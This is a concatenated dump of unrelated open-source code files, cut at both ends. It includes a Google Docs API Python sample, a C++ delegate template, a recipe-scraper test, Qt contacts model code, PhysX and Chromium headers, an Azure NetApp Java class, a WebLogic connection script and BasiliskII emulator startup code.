') file_path = '' file_path = raw_input('Save file to: ') if not file_path or not resource_id: return file_name = os.path.basename(file_path) ext = self._GetFileExtension(file_name) if not ext or ext not in gdata.docs.service.SUPPORTED_FILETYPES: print 'File type not supported. Check the file extension.' return else: content_type = gdata.docs.service.SUPPORTED_FILETYPES[ext] doc_type = resource_id[:resource_id.find(':')] # When downloading a spreadsheet, the authenticated request needs to be # sent with the spreadsheet service's auth token. if doc_type == 'spreadsheet': print 'Downloading spreadsheet to %s...' % (file_path,) docs_token = self.gd_client.GetClientLoginToken() self.gd_client.SetClientLoginToken(self.gs_client.GetClientLoginToken()) self.gd_client.Export(resource_id, file_path, gid=0) self.gd_client.SetClientLoginToken(docs_token) else: print 'Downloading document to %s...' % (file_path,) self.gd_client.Export(resource_id, file_path) def _ListDocuments(self): """Retrieves and displays a list of documents based on the user's choice.""" print 'Retrieve (all/document/folder/presentation/spreadsheet/pdf): ' category = raw_input('Enter a category: ') if category == 'all': feed = self.gd_client.GetDocumentListFeed() elif category == 'folder': query = gdata.docs.service.DocumentQuery(categories=['folder'], params={'showfolders': 'true'}) feed = self.gd_client.Query(query.ToUri()) else: query = gdata.docs.service.DocumentQuery(categories=[category]) feed = self.gd_client.Query(query.ToUri()) self._PrintFeed(feed) def _ListAclPermissions(self): """Retrieves a list of a user's folders and displays them.""" resource_id = raw_input('Enter an resource id: ') query = gdata.docs.service.DocumentAclQuery(resource_id) print '\nListing document permissions:' feed = self.gd_client.GetDocumentListAclFeed(query.ToUri()) for acl_entry in feed.entry: print '%s - %s (%s)' % (acl_entry.role.value, acl_entry.scope.value, acl_entry.scope.type) def _ModifyAclPermissions(self): """Create or updates the ACL entry on an existing document.""" resource_id = raw_input('Enter an resource id: ') email = raw_input('Enter an email address: ') role_value = raw_input('Enter a permission (reader/writer/owner/remove): ') uri = gdata.docs.service.DocumentAclQuery(resource_id).ToUri() acl_feed = self.gd_client.GetDocumentListAclFeed(uri) found_acl_entry = None for acl_entry in acl_feed.entry: if acl_entry.scope.value == email: found_acl_entry = acl_entry break if found_acl_entry: if role_value == 'remove': # delete ACL entry self.gd_client.Delete(found_acl_entry.GetEditLink().href) else: # update ACL entry found_acl_entry.role.value = role_value updated_entry = self.gd_client.Put( found_acl_entry, found_acl_entry.GetEditLink().href, converter=gdata.docs.DocumentListAclEntryFromString) else: scope = gdata.docs.Scope(value=email, type='user') role = gdata.docs.Role(value=role_value) acl_entry = gdata.docs.DocumentListAclEntry(scope=scope, role=role) inserted_entry = self.gd_client.Post( acl_entry, uri, converter=gdata.docs.DocumentListAclEntryFromString) print '\nListing document permissions:' acl_feed = self.gd_client.GetDocumentListAclFeed(uri) for acl_entry in acl_feed.entry: print '%s - %s (%s)' % (acl_entry.role.value, acl_entry.scope.value, acl_entry.scope.type) def _FullTextSearch(self): """Searches a user's documents for a text string. Provides prompts to search a user's documents and displays the results of such a search. The text_query parameter of the DocumentListQuery object corresponds to the contents of the q parameter in the feed. Note that this parameter searches the content of documents, not just their titles. """ input = raw_input('Enter search term: ') query = gdata.docs.service.DocumentQuery(text_query=input) feed = self.gd_client.Query(query.ToUri()) self._PrintFeed(feed) def _PrintMenu(self): """Displays a menu of options for the user to choose from.""" print ('\nDocument List Sample\n' '1) List your documents.\n' '2) Search your documents.\n' '3) Upload a document.\n' '4) Download a document.\n' "5) List a document's permissions.\n" "6) Add/change a document's permissions.\n" '7) Exit.\n') def _GetMenuChoice(self, max): """Retrieves the menu selection from the user. Args: max: [int] The maximum number of allowed choices (inclusive) Returns: The integer of the menu item chosen by the user. """ while True: input = raw_input('> ') try: num = int(input) except ValueError: print 'Invalid choice. Please choose a value between 1 and', max continue if num > max or num < 1: print 'Invalid choice. Please choose a value between 1 and', max else: return num def Run(self): """Prompts the user to choose funtionality to be demonstrated.""" try: while True: self._PrintMenu() choice = self._GetMenuChoice(7) if choice == 1: self._ListDocuments() elif choice == 2: self._FullTextSearch() elif choice == 3: self._UploadMenu() elif choice == 4: self._DownloadMenu() elif choice == 5: self._ListAclPermissions() elif choice == 6: self._ModifyAclPermissions() elif choice == 7: print '\nGoodbye.' return except KeyboardInterrupt: print '\nGoodbye.' return def main(): """Demonstrates use of the Docs extension using the DocsSample object.""" # Parse command line options try: opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw=']) except getopt.error, msg: print 'python docs_example.py --user [username] --pw [password] ' sys.exit(2) user = '' pw = '' key = '' # Process options for option, arg in opts: if option == '--user': user = arg elif option == '--pw': pw = arg while not user: print 'NOTE: Please run these tests only with a test account.' user = raw_input('Please enter your username: ') while not pw: pw = getpass.getpass() if not pw: print 'Password cannot be blank.' try: sample = DocsSample(user, pw) except gdata.service.BadAuthentication: print 'Invalid user credentials given.' return sample.Run() if __name__ == '__main__': main()
4,338
348
<filename>docs/data/leg-t2/040/04002181.json {"nom":"Messanges","circ":"2ème circonscription","dpt":"Landes","inscrits":853,"abs":369,"votants":484,"blancs":20,"nuls":9,"exp":455,"res":[{"nuance":"REM","nom":"<NAME>","voix":318},{"nuance":"FI","nom":"<NAME>","voix":137}]}
108
977
<filename>Sources/Utils/Delegate.hpp #pragma once #include <algorithm> #include <functional> #include <memory> #include <mutex> #include "ConstExpr.hpp" #include "NonCopyable.hpp" namespace acid { template<typename> class Delegate; class ACID_EXPORT Observer { public: Observer() : valid(std::make_shared<bool>(true)) { } virtual ~Observer() = default; std::shared_ptr<bool> valid; }; template<typename TReturnType, typename ...TArgs> class Invoker { public: using ReturnType = std::vector<TReturnType>; static ReturnType Invoke(Delegate<TReturnType(TArgs ...)> &delegate, TArgs ... params) { std::lock_guard<std::mutex> lock(delegate.mutex); ReturnType returnValues; for (auto it = delegate.functions.begin(); it != delegate.functions.end();) { if (it->IsExpired()) { it = delegate.functions.erase(it); continue; } returnValues.emplace_back((*it->function)(params...)); ++it; } return returnValues; } }; template<typename... TArgs> class Invoker<void, TArgs...> { public: using ReturnType = void; static void Invoke(Delegate<void(TArgs ...)> &delegate, TArgs ... params) { std::lock_guard<std::mutex> lock(delegate.mutex); if (delegate.functions.empty()) { return; } for (auto it = delegate.functions.begin(); it != delegate.functions.end();) { if (it->IsExpired()) { it = delegate.functions.erase(it); continue; } it->function(params...); ++it; } } }; template<typename TReturnType, typename ...TArgs> class Delegate<TReturnType(TArgs ...)> { public: using Invoker = acid::Invoker<TReturnType, TArgs...>; using FunctionType = std::function<TReturnType(TArgs ...)>; using ObserversType = std::vector<std::weak_ptr<bool>>; class FunctionPair { public: bool IsExpired() { for (const auto &observer : observers) { if (observer.expired()) { return true; } } return false; } FunctionType function; ObserversType observers; }; Delegate() = default; virtual ~Delegate() = default; template<typename ...KArgs> void Add(FunctionType &&function, KArgs ...args) { std::lock_guard<std::mutex> lock(mutex); ObserversType observers; if constexpr (sizeof...(args) != 0) { for (const auto &arg : {args...}) { observers.emplace_back(to_address(arg)->valid); } } functions.emplace_back(FunctionPair{std::move(function), observers}); } void Remove(const FunctionType &function) { std::lock_guard<std::mutex> lock(mutex); functions.erase(std::remove_if(functions.begin(), functions.end(), [function](FunctionPair &f) { return Hash(f.function) == Hash(function); }), functions.end()); } template<typename ...KArgs> void RemoveObservers(KArgs ...args) { ObserversType removes; if constexpr (sizeof...(args) != 0) { for (const auto &arg : {args...}) { removes.emplace_back(to_address(arg)->valid); } } for (auto it = functions.begin(); it != functions.end();) { for (auto it1 = it->observers.begin(); it1 != it->observers.end();) { bool erase = false; auto opt = it1->lock(); for (const auto &remove : removes) { auto ept = remove.lock(); if (opt.get() == ept.get()) erase = true; } if (erase) it1 = it->observers.erase(it1); else ++it1; } if (it->observers.empty()) it = functions.erase(it); else ++it; } } void MoveFunctions(Delegate &from, const ObserversType &exclude = {}) { for (auto it = from.functions.begin(); it < from.functions.end();) { bool move = true; for (const auto &excluded : exclude) { auto ept = excluded.lock(); for (const auto &observer : it->observers) { auto opt = observer.lock(); if (opt.get() == ept.get()) move = false; } } if (move) { std::move(from.functions.begin(), it, std::back_inserter(functions)); it = from.functions.erase(from.functions.begin(), it); } else { ++it; } } } void Clear() { std::lock_guard<std::mutex> lock(mutex); functions.clear(); } typename Invoker::ReturnType Invoke(TArgs ... args) { return Invoker::Invoke(*this, args...); } Delegate &operator+=(FunctionType &&function) { return Add(std::move(function)); } Delegate &operator-=(const FunctionType function) { return Remove(function); } typename Invoker::ReturnType operator()(TArgs ... args) { return Invoker::Invoke(*this, args...); } private: friend Invoker; static constexpr size_t Hash(const FunctionType &function) { return function.target_type().hash_code(); } std::mutex mutex; std::vector<FunctionPair> functions; }; template<typename T> class DelegateValue : public Delegate<void(T)>, NonCopyable { public: template<typename ...Args> DelegateValue(Args ...args) : value(std::forward<Args>(args)...) { } virtual ~DelegateValue() = default; DelegateValue &operator=(T value) { this->value = value; Invoke(this->value); return *this; } /** * Access the stored value. * @return The value. */ operator const T &() const noexcept { return value; } const T &get() const { return value; } const T &operator*() const { return value; } const T *operator->() const { return &value; } protected: T value; }; }
2,056
811
from recipe_scrapers.headbangerskitchen import HeadbangersKitchen from tests import ScraperTest class TestHeadbangersKitchenScraper(ScraperTest): scraper_class = HeadbangersKitchen def test_host(self): self.assertEqual("headbangerskitchen.com", self.harvester_class.host()) # def test_canonical_url(self): # self.assertEqual( # 'https://headbangerskitchen.com/recipe/keto-omelet-indian-style/', # self.harvester_class.canonical_url(), # ) def test_author(self): self.assertEqual("<NAME>", self.harvester_class.author()) def test_title(self): self.assertEqual("Keto Omelet (Indian Style)", self.harvester_class.title()) def test_total_time(self): self.assertEqual(10, self.harvester_class.total_time()) def test_yields(self): self.assertEqual("1 serving(s)", self.harvester_class.yields()) def test_image(self): self.assertEqual( "https://headbangerskitchen.com/wp-content/uploads/2020/11/KETOMASALAOMELET-Vertical.jpg", self.harvester_class.image(), ) def test_ingredients(self): self.assertEqual( [ "3 Eggs", "20 grams Cheese", "20 grams Red onion", "1 Tbsp Heavy Whipping Cream ( Order online )", "1/2 Tsp Tumeric ( Order online )", "1/2 Tsp Kashmiri Red Chilli Powder ( Order online )", "1 Tbsp Ghee", "salt and pepper to taste", "1 Tsp Coriander", ], self.harvester_class.ingredients(), ) def test_instructions(self): self.assertEqual( "Crack the 3 eggs into a bowl and add in the chopped onion, coriander, salt, pepper, tumeric, chilli powder and heavy cream and beat well.\nHeat the ghee in a frying pan and once melted add in the beaten eggs. Grate in the cheese and cover and cook for about 4 minutes. Fold the egg and finish cooking.\nServe with a side of salad.", self.harvester_class.instructions(), ) def test_ratings(self): self.assertEqual(4.33, self.harvester_class.ratings())
984
3,461
<filename>src/ui/ContactsModel.cpp /* Ricochet - https://ricochet.im/ * Copyright (C) 2014, <NAME> <<EMAIL>> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * * Neither the names of the copyright owners nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "ContactsModel.h" #include "core/IdentityManager.h" #include "core/ContactsManager.h" #include <QDebug> inline bool contactSort(const ContactUser *c1, const ContactUser *c2) { if (c1->status() != c2->status()) return c1->status() < c2->status(); return c1->nickname().localeAwareCompare(c2->nickname()) < 0; } ContactsModel::ContactsModel(QObject *parent) : QAbstractListModel(parent), m_identity(0) { } void ContactsModel::setIdentity(UserIdentity *identity) { if (identity == m_identity) return; beginResetModel(); foreach (ContactUser *user, contacts) user->disconnect(this); contacts.clear(); if (m_identity) { disconnect(m_identity, 0, this, 0); disconnect(&m_identity->contacts, 0, this, 0); } m_identity = identity; if (m_identity) { connect(&identity->contacts, SIGNAL(contactAdded(ContactUser*)), SLOT(contactAdded(ContactUser*))); contacts = identity->contacts.contacts(); std::sort(contacts.begin(), contacts.end(), contactSort); foreach (ContactUser *user, contacts) connectSignals(user); } endResetModel(); emit identityChanged(); } QModelIndex ContactsModel::indexOfContact(ContactUser *user) const { int row = contacts.indexOf(user); if (row < 0) return QModelIndex(); return index(row, 0); } ContactUser *ContactsModel::contact(int row) const { return contacts.value(row); } void ContactsModel::updateUser(ContactUser *user) { if (!user) { user = qobject_cast<ContactUser*>(sender()); if (!user) return; } int row = contacts.indexOf(user); if (row < 0) { user->disconnect(this); return; } QList<ContactUser*> sorted = contacts; std::sort(sorted.begin(), sorted.end(), contactSort); int newRow = sorted.indexOf(user); if (row != newRow) { beginMoveRows(QModelIndex(), row, row, QModelIndex(), (newRow > row) ? (newRow+1) : newRow); contacts = sorted; endMoveRows(); } emit dataChanged(index(newRow, 0), index(newRow, 0)); } void ContactsModel::connectSignals(ContactUser *user) { connect(user, SIGNAL(statusChanged()), SLOT(updateUser())); connect(user, SIGNAL(nicknameChanged()), SLOT(updateUser())); connect(user, SIGNAL(contactDeleted(ContactUser*)), SLOT(contactRemoved(ContactUser*))); } void ContactsModel::contactAdded(ContactUser *user) { Q_ASSERT(!indexOfContact(user).isValid()); connectSignals(user); QList<ContactUser*>::Iterator lp = qLowerBound(contacts.begin(), contacts.end(), user, contactSort); int row = lp - contacts.begin(); beginInsertRows(QModelIndex(), row, row); contacts.insert(lp, user); endInsertRows(); } void ContactsModel::contactRemoved(ContactUser *user) { if (!user && !(user = qobject_cast<ContactUser*>(sender()))) return; int row = contacts.indexOf(user); beginRemoveRows(QModelIndex(), row, row); contacts.removeAt(row); endRemoveRows(); disconnect(user, 0, this, 0); } QHash<int,QByteArray> ContactsModel::roleNames() const { QHash<int, QByteArray> roles; roles[Qt::DisplayRole] = "name"; roles[PointerRole] = "contact"; roles[StatusRole] = "status"; return roles; } int ContactsModel::rowCount(const QModelIndex &parent) const { if (parent.isValid()) return 0; return contacts.size(); } QVariant ContactsModel::data(const QModelIndex &index, int role) const { if (!index.isValid() || index.row() >= contacts.size()) return QVariant(); ContactUser *user = contacts[index.row()]; switch (role) { case Qt::DisplayRole: case Qt::EditRole: return user->nickname(); case PointerRole: return QVariant::fromValue(user); case StatusRole: return user->status(); } return QVariant(); }
2,045
1,863
<reponame>gongyiling/PhysX-3.4 // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of NVIDIA CORPORATION nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY // OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Copyright (c) 2018 NVIDIA Corporation. All rights reserved. #include "RTdef.h" #if RT_COMPILE /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /** * Contains code for box pruning. * \file IceBoxPruning.h * \author <NAME> * \date January, 29, 2000 */ /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Include Guard #ifndef __ICEBOXPRUNING_BASE_H__ #define __ICEBOXPRUNING_BASE_H__ //#include "vector" #include <PsArray.h> #include "IceRevisitedRadixBase.h" #include "PxVec3.h" #include "PxBounds3.h" #include <PsUserAllocated.h> namespace nvidia { namespace fracture { namespace base { struct Axes { void set(uint32_t a0, uint32_t a1, uint32_t a2) { Axis0 = a0; Axis1 = a1; Axis2 = a2; } uint32_t Axis0; uint32_t Axis1; uint32_t Axis2; }; class BoxPruning : public UserAllocated { public: // Optimized versions bool completeBoxPruning(const nvidia::Array<PxBounds3> &bounds, nvidia::Array<uint32_t> &pairs, const Axes& axes); bool bipartiteBoxPruning(const nvidia::Array<PxBounds3> &bounds0, const nvidia::Array<PxBounds3> &bounds1, nvidia::Array<uint32_t>& pairs, const Axes& axes); // Brute-force versions bool bruteForceCompleteBoxTest(const nvidia::Array<PxBounds3> &bounds, nvidia::Array<uint32_t> &pairs, const Axes& axes); bool bruteForceBipartiteBoxTest(const nvidia::Array<PxBounds3> &bounds0, const nvidia::Array<PxBounds3> &bounds1, nvidia::Array<uint32_t>& pairs, const Axes& axes); protected: nvidia::Array<float> mMinPosBounds0; nvidia::Array<float> mMinPosBounds1; nvidia::Array<float> mPosList; RadixSort mRS0, mRS1; RadixSort mRS; }; } } } #endif // __ICEBOXPRUNING_H__ #endif
1,128
1,350
// Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.netapp.implementation; import com.azure.core.management.Region; import com.azure.core.util.Context; import com.azure.resourcemanager.netapp.fluent.models.SnapshotInner; import com.azure.resourcemanager.netapp.models.Snapshot; import java.time.OffsetDateTime; public final class SnapshotImpl implements Snapshot, Snapshot.Definition { private SnapshotInner innerObject; private final com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager; SnapshotImpl(SnapshotInner innerObject, com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager) { this.innerObject = innerObject; this.serviceManager = serviceManager; } public String id() { return this.innerModel().id(); } public String name() { return this.innerModel().name(); } public String type() { return this.innerModel().type(); } public String location() { return this.innerModel().location(); } public String snapshotId() { return this.innerModel().snapshotId(); } public OffsetDateTime created() { return this.innerModel().created(); } public String provisioningState() { return this.innerModel().provisioningState(); } public Region region() { return Region.fromName(this.regionName()); } public String regionName() { return this.location(); } public SnapshotInner innerModel() { return this.innerObject; } private com.azure.resourcemanager.netapp.NetAppFilesManager manager() { return this.serviceManager; } private String resourceGroupName; private String accountName; private String poolName; private String volumeName; private String snapshotName; public SnapshotImpl withExistingVolume( String resourceGroupName, String accountName, String poolName, String volumeName) { this.resourceGroupName = resourceGroupName; this.accountName = accountName; this.poolName = poolName; this.volumeName = volumeName; return this; } public Snapshot create() { this.innerObject = serviceManager .serviceClient() .getSnapshots() .create( resourceGroupName, accountName, poolName, volumeName, snapshotName, this.innerModel(), Context.NONE); return this; } public Snapshot create(Context context) { this.innerObject = serviceManager .serviceClient() .getSnapshots() .create(resourceGroupName, accountName, poolName, volumeName, snapshotName, this.innerModel(), context); return this; } SnapshotImpl(String name, com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager) { this.innerObject = new SnapshotInner(); this.serviceManager = serviceManager; this.snapshotName = name; } public Snapshot refresh() { this.innerObject = serviceManager .serviceClient() .getSnapshots() .getWithResponse(resourceGroupName, accountName, poolName, volumeName, snapshotName, Context.NONE) .getValue(); return this; } public Snapshot refresh(Context context) { this.innerObject = serviceManager .serviceClient() .getSnapshots() .getWithResponse(resourceGroupName, accountName, poolName, volumeName, snapshotName, context) .getValue(); return this; } public SnapshotImpl withRegion(Region location) { this.innerModel().withLocation(location.toString()); return this; } public SnapshotImpl withRegion(String location) { this.innerModel().withLocation(location); return this; } }
1,696
5,519
#!/usr/bin/python # Copyright (c) 2021, Oracle and/or its affiliates. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl. import sys #============================================================ #Connect To AdminServer and create Analytics Connection #============================================================ adminHost = os.environ.get("ADMIN_SERVER_CONTAINER_NAME") adminPort = os.environ.get("ADMIN_PORT") adminName = os.environ.get("ADMIN_USERNAME") adminPassword = <PASSWORD>("ADMIN_PASSWORD") url = adminHost + ":" + adminPort connect(adminName, adminPassword, url) createAnalyticsCollectorConnection(appName='webcenter', connectionName='MyAnalyticsCollector', isUnicast=1, collectorHost='localhost', collectorPort=31314, isEnabled=1, timeout=30, default=1)
240
940
<filename>BasiliskII/src/main.cpp /* * main.cpp - Startup/shutdown code * * Basilisk II (C) 1997-2008 <NAME> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include "sysdeps.h" #include "cpu_emulation.h" #include "xpram.h" #include "timer.h" #include "sony.h" #include "disk.h" #include "cdrom.h" #include "scsi.h" #include "extfs.h" #include "audio.h" #include "video.h" #include "serial.h" #include "ether.h" #include "clip.h" #include "adb.h" #include "rom_patches.h" #include "user_strings.h" #include "prefs.h" #include "main.h" #define DEBUG 0 #include "debug.h" #if ENABLE_MON #include "mon.h" static uint32 mon_read_byte_b2(uintptr adr) { return ReadMacInt8(adr); } static void mon_write_byte_b2(uintptr adr, uint32 b) { WriteMacInt8(adr, b); } #endif /* * Initialize everything, returns false on error */ bool InitAll(const char *vmdir) { // Check ROM version if (!CheckROM()) { ErrorAlert(STR_UNSUPPORTED_ROM_TYPE_ERR); return false; } #if EMULATED_68K // Set CPU and FPU type (UAE emulation) switch (ROMVersion) { case ROM_VERSION_64K: case ROM_VERSION_PLUS: case ROM_VERSION_CLASSIC: CPUType = 0; FPUType = 0; TwentyFourBitAddressing = true; break; case ROM_VERSION_II: CPUType = PrefsFindInt32("cpu"); if (CPUType < 2) CPUType = 2; if (CPUType > 4) CPUType = 4; FPUType = PrefsFindBool("fpu") ? 1 : 0; if (CPUType == 4) FPUType = 1; // 68040 always with FPU TwentyFourBitAddressing = true; break; case ROM_VERSION_32: CPUType = PrefsFindInt32("cpu"); if (CPUType < 2) CPUType = 2; if (CPUType > 4) CPUType = 4; FPUType = PrefsFindBool("fpu") ? 1 : 0; if (CPUType == 4) FPUType = 1; // 68040 always with FPU TwentyFourBitAddressing = false; break; } CPUIs68060 = false; #endif // Load XPRAM XPRAMInit(vmdir); // Load XPRAM default values if signature not found if (XPRAM[0x0c] != 0x4e || XPRAM[0x0d] != 0x75 || XPRAM[0x0e] != 0x4d || XPRAM[0x0f] != 0x63) { D(bug("Loading XPRAM default values\n")); memset(XPRAM, 0, 0x100); XPRAM[0x0c] = 0x4e; // "NuMc" signature XPRAM[0x0d] = 0x75; XPRAM[0x0e] = 0x4d; XPRAM[0x0f] = 0x63; XPRAM[0x01] = 0x80; // InternalWaitFlags = DynWait (don't wait for SCSI devices upon bootup) XPRAM[0x10] = 0xa8; // Standard PRAM values XPRAM[0x11] = 0x00; XPRAM[0x12] = 0x00; XPRAM[0x13] = 0x22; XPRAM[0x14] = 0xcc; XPRAM[0x15] = 0x0a; XPRAM[0x16] = 0xcc; XPRAM[0x17] = 0x0a; XPRAM[0x1c] = 0x00; XPRAM[0x1d] = 0x02; XPRAM[0x1e] = 0x63; XPRAM[0x1f] = 0x00; XPRAM[0x08] = 0x13; XPRAM[0x09] = 0x88; XPRAM[0x0a] = 0x00; XPRAM[0x0b] = 0xcc; XPRAM[0x76] = 0x00; // OSDefault = MacOS XPRAM[0x77] = 0x01; } // Set boot volume int16 i16 = PrefsFindInt32("bootdrive"); XPRAM[0x78] = i16 >> 8; XPRAM[0x79] = i16 & 0xff; i16 = PrefsFindInt32("bootdriver"); XPRAM[0x7a] = i16 >> 8; XPRAM[0x7b] = i16 & 0xff; // Init drivers SonyInit(); DiskInit(); CDROMInit(); SCSIInit(); #if SUPPORTS_EXTFS // Init external file system ExtFSInit(); #endif // Init serial ports SerialInit(); // Init network EtherInit(); // Init Time Manager TimerInit(); // Init clipboard ClipInit(); // Init ADB ADBInit(); // Init audio AudioInit(); // Init video if (!VideoInit(ROMVersion == ROM_VERSION_64K || ROMVersion == ROM_VERSION_PLUS || ROMVersion == ROM_VERSION_CLASSIC)) return false; // Set default video mode in XPRAM XPRAM[0x56] = 0x42; // 'B' XPRAM[0x57] = 0x32; // '2' const monitor_desc &main_monitor = *VideoMonitors[0]; XPRAM[0x58] = uint8(main_monitor.depth_to_apple_mode(main_monitor.get_current_mode().depth)); XPRAM[0x59] = 0; #if EMULATED_68K // Init 680x0 emulation (this also activates the memory system which is needed for PatchROM()) if (!Init680x0()) return false; #endif // Install ROM patches if (!PatchROM()) { ErrorAlert(STR_UNSUPPORTED_ROM_TYPE_ERR); return false; } #if ENABLE_MON // Initialize mon mon_init(); mon_read_byte = mon_read_byte_b2; mon_write_byte = mon_write_byte_b2; #endif return true; } /* * Deinitialize everything */ void ExitAll(void) { #if ENABLE_MON // Deinitialize mon mon_exit(); #endif // Save XPRAM XPRAMExit(); // Exit video VideoExit(); // Exit audio AudioExit(); // Exit ADB ADBExit(); // Exit clipboard ClipExit(); // Exit Time Manager TimerExit(); // Exit serial ports SerialExit(); // Exit network EtherExit(); #if SUPPORTS_EXTFS // Exit external file system ExtFSExit(); #endif // Exit drivers SCSIExit(); CDROMExit(); DiskExit(); SonyExit(); } /* * Display error/warning alert given the message string ID */ void ErrorAlert(int string_id) { ErrorAlert(GetString(string_id)); } void WarningAlert(int string_id) { WarningAlert(GetString(string_id)); }
2,329
370
<reponame>luoyongheng/dtslam<filename>3rdparty/suitesparse-metis-for-windows-1.2.1/SuiteSparse/COLAMD/SourceWrappers/colamd.c #include <../Source/colamd.c>
66
2,151
<filename>third_party/blink/renderer/platform/fonts/shaping/shaping_line_breaker.h<gh_stars>1000+ // Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_ #define THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_ #include "third_party/blink/renderer/platform/layout_unit.h" #include "third_party/blink/renderer/platform/platform_export.h" #include "third_party/blink/renderer/platform/text/text_direction.h" #include "third_party/blink/renderer/platform/wtf/text/atomic_string.h" namespace blink { class Font; class ShapeResult; class HarfBuzzShaper; class Hyphenation; class LazyLineBreakIterator; enum class LineBreakType; template <typename TextContainerType> class ShapeResultSpacing; // Shapes a line of text by finding the ideal break position as indicated by the // available space and the shape results for the entire paragraph. Once an ideal // break position has been found the text is scanned backwards until a valid and // and appropriate break opportunity is identified. Unless the break opportunity // is at a safe-to-break boundary (as identified by HarfBuzz) the beginning and/ // or end of the line is reshaped to account for differences caused by breaking. // // This allows for significantly faster and more efficient line breaking by only // reshaping when absolutely necessarily and by only evaluating likely candidate // break opportunities instead of measuring and evaluating all possible options. class PLATFORM_EXPORT ShapingLineBreaker final { STACK_ALLOCATED(); public: ShapingLineBreaker(const HarfBuzzShaper*, const Font*, const ShapeResult*, const LazyLineBreakIterator*, ShapeResultSpacing<String>* = nullptr, const Hyphenation* = nullptr); ~ShapingLineBreaker() = default; // Represents details of the result of |ShapeLine()|. struct Result { STACK_ALLOCATED(); // Indicates the resulting break offset. unsigned break_offset; // True if the break is hyphenated, either by automatic hyphenation or // soft-hyphen characters. // The hyphen glyph is not included in the |ShapeResult|, and that appending // a hyphen glyph may overflow the specified available space. bool is_hyphenated; }; // Shapes a line of text by finding a valid and appropriate break opportunity // based on the shaping results for the entire paragraph. // |start_should_be_safe| is true for the beginning of each wrapped line, but // is false for subsequent ShapeResults. scoped_refptr<ShapeResult> ShapeLine(unsigned start_offset, LayoutUnit available_space, bool start_should_be_safe, Result* result_out); scoped_refptr<ShapeResult> ShapeLine(unsigned start_offset, LayoutUnit available_space, Result* result_out) { return ShapeLine(start_offset, available_space, true, result_out); } // Disable breaking at soft hyphens (U+00AD). bool IsSoftHyphenEnabled() const { return is_soft_hyphen_enabled_; } void DisableSoftHyphen() { is_soft_hyphen_enabled_ = false; } private: const String& GetText() const; unsigned PreviousBreakOpportunity(unsigned offset, unsigned start, bool* is_hyphenated) const; unsigned NextBreakOpportunity(unsigned offset, unsigned start, bool* 